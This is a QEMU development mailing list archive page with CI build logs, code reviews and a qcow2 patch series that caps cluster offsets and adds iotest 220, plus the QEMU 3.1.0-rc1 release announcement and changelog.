Checking out files:  93% (6006/6457)   
Checking out files:  94% (6070/6457)   
Checking out files:  95% (6135/6457)   
Checking out files:  96% (6199/6457)   
Checking out files:  97% (6264/6457)   
Checking out files:  98% (6328/6457)   
Checking out files:  99% (6393/6457)   
Checking out files: 100% (6457/6457)   
Checking out files: 100% (6457/6457), done.
Your branch is up-to-date with 'origin/test'.
Submodule 'dtc' (https://git.qemu.org/git/dtc.git) registered for path 'dtc'
Cloning into 
'/var/tmp/patchew-tester-tmp-iuk2n7nv/src/docker-src.2018-11-13-17.53.03.16071/qemu.tar.vroot/dtc'...
Submodule path 'dtc': checked out '88f18909db731a627456f26d779445f84e449536'
Submodule 'ui/keycodemapdb' (https://git.qemu.org/git/keycodemapdb.git) 
registered for path 'ui/keycodemapdb'
Cloning into 
'/var/tmp/patchew-tester-tmp-iuk2n7nv/src/docker-src.2018-11-13-17.53.03.16071/qemu.tar.vroot/ui/keycodemapdb'...
Submodule path 'ui/keycodemapdb': checked out 
'6b3d716e2b6472eb7189d3220552280ef3d832ce'
  COPYRUNNER
RUN test-quick in qemu:centos7 
Packages installed:
SDL-devel-1.2.15-14.el7.x86_64
bison-3.0.4-1.el7.x86_64
bzip2-1.0.6-13.el7.x86_64
bzip2-devel-1.0.6-13.el7.x86_64
ccache-3.3.4-1.el7.x86_64
csnappy-devel-0-6.20150729gitd7bc683.el7.x86_64
flex-2.5.37-3.el7.x86_64
gcc-4.8.5-28.el7_5.1.x86_64
gettext-0.19.8.1-2.el7.x86_64
git-1.8.3.1-14.el7_5.x86_64
glib2-devel-2.54.2-2.el7.x86_64
libaio-devel-0.3.109-13.el7.x86_64
libepoxy-devel-1.3.1-2.el7_5.x86_64
libfdt-devel-1.4.6-1.el7.x86_64
lzo-devel-2.06-8.el7.x86_64
make-3.82-23.el7.x86_64
mesa-libEGL-devel-17.2.3-8.20171019.el7.x86_64
mesa-libgbm-devel-17.2.3-8.20171019.el7.x86_64
nettle-devel-2.7.1-8.el7.x86_64
package g++ is not installed
package librdmacm-devel is not installed
pixman-devel-0.34.0-1.el7.x86_64
spice-glib-devel-0.34-3.el7_5.1.x86_64
spice-server-devel-0.14.0-2.el7_5.4.x86_64
tar-1.26-34.el7.x86_64
vte-devel-0.28.2-10.el7.x86_64
xen-devel-4.6.6-12.el7.x86_64

Re: [Qemu-devel] [PATCH v3 1/3] blkdebug: fix one shot rule processing

2018-11-13 Thread John Snow



On 11/12/18 2:06 AM, Marc Olson via Qemu-devel wrote:
> If 'once' is specified, the rule should execute just once, regardless if
> it is supposed to return an error or not. Take the example where you
> want the first IO to an LBA to succeed, but subsequent IOs to fail. You
> could either use state transitions, or create two rules, one with
> error = 0 and once set to true, and one with a non-zero error.
> 
> Signed-off-by: Marc Olson 
> ---
>  block/blkdebug.c | 4 ++--
>  1 file changed, 2 insertions(+), 2 deletions(-)
> 
> diff --git a/block/blkdebug.c b/block/blkdebug.c
> index 0759452..327049b 100644
> --- a/block/blkdebug.c
> +++ b/block/blkdebug.c
> @@ -488,7 +488,7 @@ static int rule_check(BlockDriverState *bs, uint64_t 
> offset, uint64_t bytes)
>  }
>  }
>  
> -if (!rule || !rule->options.inject.error) {
> +if (!rule) {
>  return 0;
>  }
>  

This gets rid of the early return so that later we check to see if
'once' was set and remove the rule, regardless of if it did anything or not,

> @@ -500,7 +500,7 @@ static int rule_check(BlockDriverState *bs, uint64_t 
> offset, uint64_t bytes)
>  remove_rule(rule);
>  }
>  
> -if (!immediately) {
> +if (error && !immediately) {

And then we modify this to only trigger if we have an error to inject.

>  aio_co_schedule(qemu_get_current_aio_context(), 
> qemu_coroutine_self());
>  qemu_coroutine_yield();
>  }
> 

[down here, we return -error, but that should still be zero.]


This changes the mechanism of 'once' slightly, but only when errno was
set to zero. I'm not sure we make use of that anywhere, so I think this
should be a safe change. Certainly we don't stipulate that we only
respect once if you bothered to set errno to a non-zero value.

I think this is probably fine.

Reviewed-by: John Snow 



[Qemu-devel] [PATCH for 3.1 v3 0/3] minor qcow2 compression improvements

2018-11-13 Thread Eric Blake
As the added iotests shows, we have a (corner case) data corruption
that is user triggerable, therefore, this is still appropriate for
inclusion in 3.1.

v6 was here:
https://lists.gnu.org/archive/html/qemu-devel/2018-06/msg08497.html

since then:
- don't reduce constraints on reftable [Kevin]
- rebase to recent iotests changes
- drop patches that might conflict with Vladimir's work now on Kevin's
block-next branch

001/3:[0042] [FC] 'qcow2: Document some maximum size constraints'
002/3:[0003] [FC] 'qcow2: Don't allow overflow during cluster allocation'
003/3:[0003] [FC] 'iotests: Add new test 220 for max compressed cluster offset'

Eric Blake (3):
  qcow2: Document some maximum size constraints
  qcow2: Don't allow overflow during cluster allocation
  iotests: Add new test 220 for max compressed cluster offset

 docs/interop/qcow2.txt | 30 +++-
 block/qcow2.h  |  6 +++
 block/qcow2-refcount.c | 20 +---
 tests/qemu-iotests/220 | 96 ++
 tests/qemu-iotests/220.out | 54 +
 tests/qemu-iotests/group   |  1 +
 6 files changed, 198 insertions(+), 9 deletions(-)
 create mode 100755 tests/qemu-iotests/220
 create mode 100644 tests/qemu-iotests/220.out

-- 
2.17.2




[Qemu-devel] [ANNOUNCE] QEMU 3.1.0-rc1 is now available

2018-11-13 Thread Michael Roth
Hello,

On behalf of the QEMU Team, I'd like to announce the availability of the
second release candidate for the QEMU 3.1 release.  This release is meant
for testing purposes and should not be used in a production environment.

  http://download.qemu-project.org/qemu-3.1.0-rc1.tar.xz
  http://download.qemu-project.org/qemu-3.1.0-rc1.tar.xz.sig

You can help improve the quality of the QEMU 3.1 release by testing this
release and reporting bugs on Launchpad:

  https://bugs.launchpad.net/qemu/

The release plan, as well as documented known issues for release
candidates, are available at:

  http://wiki.qemu.org/Planning/3.1

Please add entries to the ChangeLog for the 3.1 release below:

  http://wiki.qemu.org/ChangeLog/3.1

Thank you to everyone involved!

Changes since rc0:

cb968d275c: Update version for v3.1.0-rc1 release (Peter Maydell)
436c0cbbeb: target/arm/cpu: Give Cortex-A15 and -A7 the EL2 feature (Peter 
Maydell)
593cfa2b63: target/arm: Hyp mode R14 is shared with User and System (Peter 
Maydell)
89430fc6f8: target/arm: Correctly implement handling of HCR_EL2.{VI, VF} (Peter 
Maydell)
ed89f078ff: target/arm: Track the state of our irq lines from the GIC 
explicitly (Peter Maydell)
c624ea0fa7: Revert "target/arm: Implement HCR.VI and VF" (Peter Maydell)
22af90255e: arm: fix aa64_generate_debug_exceptions to work with EL2 (Alex 
Bennée)
b281ba4223: arm: use symbolic MDCR_TDE in arm_debug_target_el (Alex Bennée)
f251cb2371: tests/guest-debug: fix scoping of failcount (Alex Bennée)
14f9a5c0e4: target/arm64: kvm debug set target_el when passing exception to 
guest (Alex Bennée)
9b16ec4351: target/arm64: hold BQL when calling do_interrupt() (Alex Bennée)
864df2058d: target/arm64: properly handle DBGVR RESS bits (Alex Bennée)
09a86dfa3f: target/arm: Fix typo in tlbi_aa64_vmalle1_write (Richard Henderson)
e9ac8e84f0: hw/arm/sysbus-fdt: Only call match_fn callback if the type matches 
(Eric Auger)
671f11b204: MAINTAINERS: Add an entry for the 'collie' machine (Thomas Huth)
e24ad48490: target/arm: Remove antique TODO comment (Peter Maydell)
521ed6b401: target/arm: Remove workaround for small SAU regions (Peter Maydell)
7cb6d3c9be: qcow2: Read outside array bounds in qcow2_pre_write_overlap_check() 
(Liam Merwick)
8d9401c279: block: Fix potential Null pointer dereferences in vvfat.c (Liam 
Merwick)
2e2db26009: qemu-img: assert block_job_get() does not return NULL in 
img_commit() (Liam Merwick)
602414d123: block: Null pointer dereference in blk_root_get_parent_desc() (Liam 
Merwick)
c2032289b0: job: Fix off-by-one assert checks for JobSTT and JobVerbTable (Liam 
Merwick)
2f74013655: block: Make more block drivers compile-time configurable (Jeff Cody)
aef96d7d4f: tests: Add unit tests for image locking (Fam Zheng)
f2e3af29b7: file-posix: Drop s->lock_fd (Fam Zheng)
2996ffad3a: file-posix: Skip effectiveless OFD lock operations (Fam Zheng)
a883d6a0bc: nvme: free cmbuf in nvme_exit (Li Qiang)
20faf0f5f8: nvme: don't unref ctrl_mem when device unrealized (Li Qiang)
d52e1a0e96: blockdev: Consistently use snapshot_node_name in 
external_snapshot_prepare() (Peter Maydell)
63d5341f85: blockdev: handle error on block latency histogram set error 
(zhenwei pi)
db0754df88: file-posix: Use error API properly (Fam Zheng)
113a9dd73f: linux-user: Add support for SO_REUSEPORT (Yunqiang Su)
435cc3e4d5: hw/acpi/nvdimm: Don't take address of fields in packed structs 
(Peter Maydell)
9f214bd390: linux-user: Clean up nios2 main loop signal handling (Peter Maydell)
b10089a14c: linux-user: Don't call gdb_handlesig() before queue_signal() (Peter 
Maydell)
e285977e77: linux-user: Remove dead error-checking code (Peter Maydell)
f1aba960cc: ui/gtk: fix cursor in egl mode (Gerd Hoffmann)
6cdc2d189c: pulseaudio: process audio data in smaller chunks (Gerd Hoffmann)
627c865d22: edid: silence a stringop-overflow warning (Marc-André Lureau)
c0188e69d3: bt: Mark the bluetooth subsystem as deprecated (Thomas Huth)
b4c0595446: docker: use HTTPS git URL for virglrenderer (Stefan Hajnoczi)
06bef596ce: target-alpha: use HTTPS git URL for palcode (Stefan Hajnoczi)
8308ed30a2: pc-testdev: use HTTPS git URL (Stefan Hajnoczi)
ebe2aad24e: git: use HTTPS git URLs for repo.or.cz (Stefan Hajnoczi)
a897f22b59: gitmodules: use 'https://' instead of 'git://' (Stefan Hajnoczi)
e18a8b3423: MAINTAINERS: use 'https://' instead of 'git://' for GitHub (Stefan 
Hajnoczi)
86e6010a7a: get_maintainer: use 'https://' instead of 'git://' (Stefan Hajnoczi)
c814b17762: README: use 'https://' instead of 'git://' (Stefan Hajnoczi)
5c75f3adbb: slirp: fork_exec(): create and connect child socket before fork() 
(Peter Maydell)
4ded9bb54c: slirp: Remove code that handles socreate() failure (Peter Maydell)
84ec9bfaf2: slirp: Use g_new() to allocate sockets in socreate() (Peter Maydell)
c41868152a: slirp: Don't pass possibly -1 fd to send() (Peter Maydell)
61baac2fdb: qga: Add multiple include guard to guest-agent-core.h (Peter 
Maydell)
f898ee0f99: qga-win: fix leaks of 

[Qemu-devel] [PATCH v3 2/3] qcow2: Don't allow overflow during cluster allocation

2018-11-13 Thread Eric Blake
Our code was already checking that we did not attempt to
allocate more clusters than what would fit in an INT64 (the
physical maximum if we can access a full off_t's worth of
data).  But this does not catch smaller limits enforced by
various spots in the qcow2 image description: L1 and normal
clusters of L2 are documented as having bits 63-56 reserved
for other purposes, capping our maximum offset at 64PB (bit
55 is the maximum bit set).  And for compressed images with
2M clusters, the cap drops the maximum offset to bit 48, or
a maximum offset of 512TB.  If we overflow that offset, we
would write compressed data into one place, but try to
decompress from another, which won't work.

It's actually possible to prove that overflow can cause image
corruption without this patch; I'll add the iotests separately
in the next commit.

Signed-off-by: Eric Blake 
Reviewed-by: Alberto Garcia 

---
v8: don't artificially cap reftable allocations [Kevin]
v6: improve commit message, now that iotests is possible [Max]
v3: use s->cluster_offset_mask instead of open-coding it [Berto],
use MIN() to clamp offset on small cluster size, add spec patch
first to justify clamping even on refcount allocations
---
 block/qcow2.h  |  6 ++
 block/qcow2-refcount.c | 20 +---
 2 files changed, 19 insertions(+), 7 deletions(-)

diff --git a/block/qcow2.h b/block/qcow2.h
index 29c98d87a07..8662b685753 100644
--- a/block/qcow2.h
+++ b/block/qcow2.h
@@ -42,6 +42,12 @@
 #define QCOW_MAX_CRYPT_CLUSTERS 32
 #define QCOW_MAX_SNAPSHOTS 65536

+/* Field widths in qcow2 mean normal cluster offsets cannot reach
+ * 64PB; depending on cluster size, compressed clusters can have a
+ * smaller limit (64PB for up to 16k clusters, then ramps down to
+ * 512TB for 2M clusters).  */
+#define QCOW_MAX_CLUSTER_OFFSET ((1ULL << 56) - 1)
+
 /* 8 MB refcount table is enough for 2 PB images at 64k cluster size
  * (128 GB for 512 byte clusters, 2 EB for 2 MB clusters) */
 #define QCOW_MAX_REFTABLE_SIZE S_8MiB
diff --git a/block/qcow2-refcount.c b/block/qcow2-refcount.c
index 46082aeac1d..1c63ac244ac 100644
--- a/block/qcow2-refcount.c
+++ b/block/qcow2-refcount.c
@@ -31,7 +31,8 @@
 #include "qemu/bswap.h"
 #include "qemu/cutils.h"

-static int64_t alloc_clusters_noref(BlockDriverState *bs, uint64_t size);
+static int64_t alloc_clusters_noref(BlockDriverState *bs, uint64_t size,
+uint64_t max);
 static int QEMU_WARN_UNUSED_RESULT update_refcount(BlockDriverState *bs,
 int64_t offset, int64_t length, uint64_t addend,
 bool decrease, enum qcow2_discard_type type);
@@ -362,7 +363,7 @@ static int alloc_refcount_block(BlockDriverState *bs,
 }

 /* Allocate the refcount block itself and mark it as used */
-int64_t new_block = alloc_clusters_noref(bs, s->cluster_size);
+int64_t new_block = alloc_clusters_noref(bs, s->cluster_size, INT64_MAX);
 if (new_block < 0) {
 return new_block;
 }
@@ -954,7 +955,8 @@ int qcow2_update_cluster_refcount(BlockDriverState *bs,


 /* return < 0 if error */
-static int64_t alloc_clusters_noref(BlockDriverState *bs, uint64_t size)
+static int64_t alloc_clusters_noref(BlockDriverState *bs, uint64_t size,
+uint64_t max)
 {
 BDRVQcow2State *s = bs->opaque;
 uint64_t i, nb_clusters, refcount;
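Review bot: the new `max` parameter of alloc_clusters_noref is undocumented; the only header comment is `/* return < 0 if error */`, and what the bound means (the later hunk returns -EFBIG when the cluster index of the last allocated cluster exceeds `max >> s->cluster_bits`) has to be reconstructed from the body. Suggest expanding it to `/* Allocate @size bytes of clusters; fail with -EFBIG if the index of any cluster in the range would exceed @max >> cluster_bits. Returns the offset of the first cluster, or < 0 on error. */`. The function's body runs past the end of this hunk.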
@@ -979,9 +981,9 @@ retry:
 }

 /* Make sure that all offsets in the "allocated" range are representable
- * in an int64_t */
+ * in the requested max */
 if (s->free_cluster_index > 0 &&
-s->free_cluster_index - 1 > (INT64_MAX >> s->cluster_bits))
+s->free_cluster_index - 1 > (max >> s->cluster_bits))
 {
 return -EFBIG;
 }
@@ -1001,7 +1003,7 @@ int64_t qcow2_alloc_clusters(BlockDriverState *bs, 
uint64_t size)

 BLKDBG_EVENT(bs->file, BLKDBG_CLUSTER_ALLOC);
 do {
-offset = alloc_clusters_noref(bs, size);
+offset = alloc_clusters_noref(bs, size, QCOW_MAX_CLUSTER_OFFSET);
 if (offset < 0) {
 return offset;
 }
@@ -1083,7 +1085,11 @@ int64_t qcow2_alloc_bytes(BlockDriverState *bs, int size)
 free_in_cluster = s->cluster_size - offset_into_cluster(s, offset);
 do {
 if (!offset || free_in_cluster < size) {
-int64_t new_cluster = alloc_clusters_noref(bs, s->cluster_size);
+int64_t new_cluster;
+
+new_cluster = alloc_clusters_noref(bs, s->cluster_size,
+   MIN(s->cluster_offset_mask,
+   QCOW_MAX_CLUSTER_OFFSET));
 if (new_cluster < 0) {
 return new_cluster;
 }
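Review bot: The bound passed here constrains only the cluster start returned by alloc_clusters_noref, yet the byte offset qcow2_alloc_bytes eventually hands back can lie anywhere inside that cluster (see the `free_in_cluster` bookkeeping above); this is still safe only because `new_cluster` is cluster-aligned and both candidate limits appear to be of the form 2^k - 1 with k >= cluster_bits, so a start that fits implies every byte inside the cluster fits too. That reasoning is worth keeping next to the call, e.g. `/* new_cluster is cluster-aligned, so any byte offset inside it also fits in the compressed descriptor's offset field */`. Whether `cluster_offset_mask` is exactly the compressed-descriptor offset mask is not visible in this hunk, and the function starts before and ends after it.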
-- 
2.17.2




[Qemu-devel] [PATCH v3 3/3] iotests: Add new test 220 for max compressed cluster offset

2018-11-13 Thread Eric Blake
If you have a capable file system (tmpfs is good, ext4 not so much;
run ./check with TEST_DIR pointing to a good location so as not
to skip the test), it's actually possible to create a qcow2 file
that expands to a sparse 512T image with just over 38M of content.
The test is not the world's fastest (qemu crawling through 256M
bits of refcount table to find the next cluster to allocate takes
several seconds, as does qemu-img check reporting millions of
leaked clusters); but it DOES catch the problem that the previous
patch just fixed where writing a compressed cluster to a full
image ended up overwriting the wrong cluster.

Suggested-by: Max Reitz 
Signed-off-by: Eric Blake 
Reviewed-by: Alberto Garcia 

---
v8: prefer $() over ``
v7: s/214/220/
v6: new patch; took over 90 seconds to run on my setup, using tmpfs
---
 tests/qemu-iotests/220 | 96 ++
 tests/qemu-iotests/220.out | 54 +
 tests/qemu-iotests/group   |  1 +
 3 files changed, 151 insertions(+)
 create mode 100755 tests/qemu-iotests/220
 create mode 100644 tests/qemu-iotests/220.out

diff --git a/tests/qemu-iotests/220 b/tests/qemu-iotests/220
new file mode 100755
index 000..0c5682bda07
--- /dev/null
+++ b/tests/qemu-iotests/220
@@ -0,0 +1,96 @@
+#!/bin/bash
+#
+# max limits on compression in huge qcow2 files
+#
+# Copyright (C) 2018 Red Hat, Inc.
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program.  If not, see .
+#
+
+seq=$(basename $0)
+echo "QA output created by $seq"
+
+status=1# failure is the default!
+
+_cleanup()
+{
+_cleanup_test_img
+}
+trap "_cleanup; exit \$status" 0 1 2 3 15
+
+# get standard environment, filters and checks
+. ./common.rc
+. ./common.filter
+. ./common.pattern
+
+_supported_fmt qcow2
+_supported_proto file
+_supported_os Linux
+
+echo "== Creating huge file =="
+
+# Sanity check: We require a file system that permits the creation
+# of a HUGE (but very sparse) file.  tmpfs works, ext4 does not.
+if ! truncate --size=513T "$TEST_IMG"; then
+_notrun "file system on $TEST_DIR does not support large enough files"
+fi
+rm "$TEST_IMG"
+IMGOPTS='cluster_size=2M,refcount_bits=1' _make_test_img 513T
+
+echo "== Populating refcounts =="
+# We want an image with 256M refcounts * 2M clusters = 512T referenced.
+# Each 2M cluster holds 16M refcounts; the refcount table initially uses
+# 1 refblock, so we need to add 15 more.  The refcount table lives at 2M,
+# first refblock at 4M, L2 at 6M, so our remaining additions start at 8M.
+# Then, for each refblock, mark it as fully populated.
+to_hex() {
+printf %016x\\n $1 | sed 's/\(..\)/\\x\1/g'
+}
+truncate --size=38m "$TEST_IMG"
+entry=$((0x20))
+$QEMU_IO_PROG -f raw -c "w -P 0xff 4m 2m" "$TEST_IMG" | _filter_qemu_io
+for i in {1..15}; do
+offs=$((0x60 + i*0x20))
+poke_file "$TEST_IMG" $((i*8 + entry)) $(to_hex $offs)
+$QEMU_IO_PROG -f raw -c "w -P 0xff $offs 2m" "$TEST_IMG" | _filter_qemu_io
+done
+
+echo "== Checking file before =="
+# FIXME: 'qemu-img check' doesn't diagnose refcounts beyond the end of
+# the file as leaked clusters
+_check_test_img 2>&1 | sed '/^Leaked cluster/d'
+stat -c 'image size %s' "$TEST_IMG"
+
+echo "== Trying to write compressed cluster =="
+# Given our file size, the next available cluster at 512T lies beyond the
+# maximum offset that a compressed 2M cluster can reside in
+$QEMU_IO_PROG -c 'w -c 0 2m' "$TEST_IMG" | _filter_qemu_io
+# The attempt failed, but ended up allocating a new refblock
+stat -c 'image size %s' "$TEST_IMG"
+
+echo "== Writing normal cluster =="
+# The failed write should not corrupt the image, so a normal write succeeds
+$QEMU_IO_PROG -c 'w 0 2m' "$TEST_IMG" | _filter_qemu_io
+
+echo "== Checking file after =="
+# qemu-img now sees the millions of leaked clusters, thanks to the allocations
+# at 512T.  Undo many of our faked references to speed up the check.
+$QEMU_IO_PROG -f raw -c "w -z 5m 1m" -c "w -z 8m 30m" "$TEST_IMG" |
+_filter_qemu_io
+_check_test_img 2>&1 | sed '/^Leaked cluster/d'
+
+# success, all done
+echo "*** done"
+rm -f $seq.full
+status=0
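Review bot: `status=1# failure is the default!` as shown has no whitespace between `1` and `#`, and in bash `#` only introduces a comment at the start of a word, so this line as printed would assign `1#` to `status` and then try to execute a command named `failure`; presumably a tab was lost in transit, but it is worth confirming the committed file reads `status=1	# failure is the default!` like the other iotests. The rest of the script follows the harness conventions (unquoted `$1` in `to_hex`, unquoted `$seq.full`), which is fine given the values involved contain no whitespace.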
diff --git a/tests/qemu-iotests/220.out b/tests/qemu-iotests/220.out
new file mode 100644
index 000..af3021fd883
--- /dev/null
+++ b/tests/qemu-iotests/220.out
@@ -0,0 +1,54 @@
+QA output created by 220
+== Creating huge file ==
+Formatting 'TEST_DIR/t.IMGFMT', fmt=IMGFMT 

[Qemu-devel] [PATCH v3 1/3] qcow2: Document some maximum size constraints

2018-11-13 Thread Eric Blake
Although off_t permits up to 63 bits (8EB) of file offsets, in
practice, we're going to hit other limits first.  Document some
of those limits in the qcow2 spec, and how choice of cluster size
can influence some of the limits.

While we cannot map any virtual cluster to any address higher than
64 PB (56 bits) (due to the current L1/L2 field encoding stopping
at bit 55), the refcount table can currently be sized larger.  For
comparison, ext4 with 4k blocks caps files at 16PB.

Another interesting limit: for compressed clusters, the L2 layout
requires an ever-smaller maximum host offset as cluster size gets
larger, down to a 512 TB maximum with 2M clusters.

Signed-off-by: Eric Blake 

--
v8: don't try and limit refcount (R-b dropped)
v5: even more wording tweaks
v4: more wording tweaks
v3: new patch
---
 docs/interop/qcow2.txt | 30 --
 1 file changed, 28 insertions(+), 2 deletions(-)

diff --git a/docs/interop/qcow2.txt b/docs/interop/qcow2.txt
index 845d40a086d..89faf7b99f3 100644
--- a/docs/interop/qcow2.txt
+++ b/docs/interop/qcow2.txt
@@ -40,7 +40,16 @@ The first cluster of a qcow2 image contains the file header:
 with larger cluster sizes.

  24 - 31:   size
-Virtual disk size in bytes
+Virtual disk size in bytes.
+
+Note: with a 2 MB cluster size, the maximum
+virtual size is 2 EB (61 bits) for a fully sparse
+file; however, L1/L2 table layouts limit an image
+to no more than 64 PB (56 bits) of populated
+clusters, and an image may hit other limits first
+(such as a file system's maximum size).  With a
+512 byte cluster size, the maximum virtual size
+drops to 128 GB (37 bits).

  32 - 35:   crypt_method
 0 for no encryption
@@ -326,6 +335,11 @@ in the image file.
 It contains pointers to the second level structures which are called refcount
 blocks and are exactly one cluster in size.

+Although the refcount table can reserve clusters past 64 PB (56 bits)
+(assuming the underlying protocol can even be sized that large), note
+that some qcow2 metadata such as L1/L2 tables must point to clusters
+prior to that point.
+
 Given an offset into the image file, the refcount of its cluster can be
 obtained as follows:

@@ -365,6 +379,16 @@ The L1 table has a variable size (stored in the header) 
and may use multiple
 clusters, however it must be contiguous in the image file. L2 tables are
 exactly one cluster in size.

+The L1 and L2 tables have implications on the maximum virtual file
+size; a larger cluster size is required for the guest to have access
+to more space.  Furthermore, a virtual cluster must currently map to a
+host offset below 64 PB (56 bits) (although this limit could be
+relaxed by putting reserved bits into use).  Additionally, as cluster
+size increases, the maximum host offset for a compressed cluster is
+reduced (a 2M cluster size requires compressed clusters to reside
+below 512 TB (49 bits), and this limit cannot be relaxed without an
+incompatible layout change).
+
 Given an offset into the virtual disk, the offset into the image file can be
 obtained as follows:

@@ -427,7 +451,9 @@ Standard Cluster Descriptor:
 Compressed Clusters Descriptor (x = 62 - (cluster_bits - 8)):

 Bit  0 - x-1:   Host cluster offset. This is usually _not_ aligned to a
-cluster or sector boundary!
+cluster or sector boundary!  If cluster_bits is
+small enough that this field includes bits beyond
+55, those upper bits must be set to 0.

  x - 61:Number of additional 512-byte sectors used for the
 compressed data, beyond the sector containing the offset
-- 
2.17.2




Re: [Qemu-devel] [PATCH v2 0/3] fsdev-throttle-qmp: qmp interface for fsdev io throttling

2018-11-13 Thread no-reply
Hi,

This series failed the docker-mingw@fedora build test. Please find the testing commands and

their output below. If you have Docker installed, you can probably reproduce it
locally.

Type: series
Message-id: cover.1542110461.git.xiezh...@huawei.com
Subject: [Qemu-devel] [PATCH v2 0/3] fsdev-throttle-qmp: qmp interface for 
fsdev io throttling

=== TEST SCRIPT BEGIN ===
#!/bin/bash
time make docker-test-mingw@fedora SHOW_ENV=1 J=8
=== TEST SCRIPT END ===

Updating 3c8cf5a9c21ff8782164d1def7f44bd888713384
Switched to a new branch 'test'
fa53c78941 fsdev-throttle-qmp: hmp interface for fsdev io throttling
468c324722 fsdev-throttle-qmp: qmp interface for fsdev io throttling
e0698a59db fsdev-throttle-qmp: refactor code for qmp interface for io throttling

=== OUTPUT BEGIN ===
  BUILD   fedora
make[1]: Entering directory '/var/tmp/patchew-tester-tmp-eoac107z/src'
  GEN 
/var/tmp/patchew-tester-tmp-eoac107z/src/docker-src.2018-11-13-17.49.44.9850/qemu.tar
Cloning into 
'/var/tmp/patchew-tester-tmp-eoac107z/src/docker-src.2018-11-13-17.49.44.9850/qemu.tar.vroot'...
done.
Your branch is up-to-date with 'origin/test'.
Submodule 'dtc' (https://git.qemu.org/git/dtc.git) registered for path 'dtc'
Cloning into 
'/var/tmp/patchew-tester-tmp-eoac107z/src/docker-src.2018-11-13-17.49.44.9850/qemu.tar.vroot/dtc'...
Submodule path 'dtc': checked out '88f18909db731a627456f26d779445f84e449536'
Submodule 'ui/keycodemapdb' (https://git.qemu.org/git/keycodemapdb.git) 
registered for path 'ui/keycodemapdb'
Cloning into 
'/var/tmp/patchew-tester-tmp-eoac107z/src/docker-src.2018-11-13-17.49.44.9850/qemu.tar.vroot/ui/keycodemapdb'...
Submodule path 'ui/keycodemapdb': checked out 
'6b3d716e2b6472eb7189d3220552280ef3d832ce'
  COPYRUNNER
RUN test-mingw in qemu:fedora 
Packages installed:
SDL2-devel-2.0.8-5.fc28.x86_64
bc-1.07.1-5.fc28.x86_64
bison-3.0.4-9.fc28.x86_64
bluez-libs-devel-5.50-1.fc28.x86_64
brlapi-devel-0.6.7-19.fc28.x86_64
bzip2-1.0.6-26.fc28.x86_64
bzip2-devel-1.0.6-26.fc28.x86_64
ccache-3.4.2-2.fc28.x86_64
clang-6.0.1-1.fc28.x86_64
device-mapper-multipath-devel-0.7.4-3.git07e7bd5.fc28.x86_64
findutils-4.6.0-19.fc28.x86_64
flex-2.6.1-7.fc28.x86_64
gcc-8.1.1-5.fc28.x86_64
gcc-c++-8.1.1-5.fc28.x86_64
gettext-0.19.8.1-14.fc28.x86_64
git-2.17.1-3.fc28.x86_64
glib2-devel-2.56.1-4.fc28.x86_64
glusterfs-api-devel-4.1.2-2.fc28.x86_64
gnutls-devel-3.6.3-3.fc28.x86_64
gtk3-devel-3.22.30-1.fc28.x86_64
hostname-3.20-3.fc28.x86_64
libaio-devel-0.3.110-11.fc28.x86_64
libasan-8.1.1-5.fc28.x86_64
libattr-devel-2.4.48-3.fc28.x86_64
libcap-devel-2.25-9.fc28.x86_64
libcap-ng-devel-0.7.9-4.fc28.x86_64
libcurl-devel-7.59.0-6.fc28.x86_64
libfdt-devel-1.4.6-5.fc28.x86_64
libpng-devel-1.6.34-6.fc28.x86_64
librbd-devel-12.2.7-1.fc28.x86_64
libssh2-devel-1.8.0-7.fc28.x86_64
libubsan-8.1.1-5.fc28.x86_64
libusbx-devel-1.0.22-1.fc28.x86_64
libxml2-devel-2.9.8-4.fc28.x86_64
llvm-6.0.1-6.fc28.x86_64
lzo-devel-2.08-12.fc28.x86_64
make-4.2.1-6.fc28.x86_64
mingw32-SDL2-2.0.5-3.fc27.noarch
mingw32-bzip2-1.0.6-9.fc27.noarch
mingw32-curl-7.57.0-1.fc28.noarch
mingw32-glib2-2.56.1-1.fc28.noarch
mingw32-gmp-6.1.2-2.fc27.noarch
mingw32-gnutls-3.6.2-1.fc28.noarch
mingw32-gtk3-3.22.30-1.fc28.noarch
mingw32-libjpeg-turbo-1.5.1-3.fc27.noarch
mingw32-libpng-1.6.29-2.fc27.noarch
mingw32-libssh2-1.8.0-3.fc27.noarch
mingw32-libtasn1-4.13-1.fc28.noarch
mingw32-nettle-3.4-1.fc28.noarch
mingw32-pixman-0.34.0-3.fc27.noarch
mingw32-pkg-config-0.28-9.fc27.x86_64
mingw64-SDL2-2.0.5-3.fc27.noarch
mingw64-bzip2-1.0.6-9.fc27.noarch
mingw64-curl-7.57.0-1.fc28.noarch
mingw64-glib2-2.56.1-1.fc28.noarch
mingw64-gmp-6.1.2-2.fc27.noarch
mingw64-gnutls-3.6.2-1.fc28.noarch
mingw64-gtk3-3.22.30-1.fc28.noarch
mingw64-libjpeg-turbo-1.5.1-3.fc27.noarch
mingw64-libpng-1.6.29-2.fc27.noarch
mingw64-libssh2-1.8.0-3.fc27.noarch
mingw64-libtasn1-4.13-1.fc28.noarch
mingw64-nettle-3.4-1.fc28.noarch
mingw64-pixman-0.34.0-3.fc27.noarch
mingw64-pkg-config-0.28-9.fc27.x86_64
ncurses-devel-6.1-5.20180224.fc28.x86_64
nettle-devel-3.4-2.fc28.x86_64
nss-devel-3.38.0-1.0.fc28.x86_64
numactl-devel-2.0.11-8.fc28.x86_64
package PyYAML is not installed
package libjpeg-devel is not installed
perl-5.26.2-413.fc28.x86_64
pixman-devel-0.34.0-8.fc28.x86_64
python3-3.6.5-1.fc28.x86_64
snappy-devel-1.1.7-5.fc28.x86_64
sparse-0.5.2-1.fc28.x86_64
spice-server-devel-0.14.0-4.fc28.x86_64
systemtap-sdt-devel-3.3-1.fc28.x86_64
tar-1.30-3.fc28.x86_64
usbredir-devel-0.8.0-1.fc28.x86_64
virglrenderer-devel-0.6.0-4.20170210git76b3da97b.fc28.x86_64
vte3-devel-0.36.5-6.fc28.x86_64
which-2.21-8.fc28.x86_64
xen-devel-4.10.1-5.fc28.x86_64
zlib-devel-1.2.11-8.fc28.x86_64

Environment variables:
TARGET_LIST=
PACKAGES=bc bison bluez-libs-devel brlapi-devel bzip2 
bzip2-devel ccache clang device-mapper-multipath-devel 
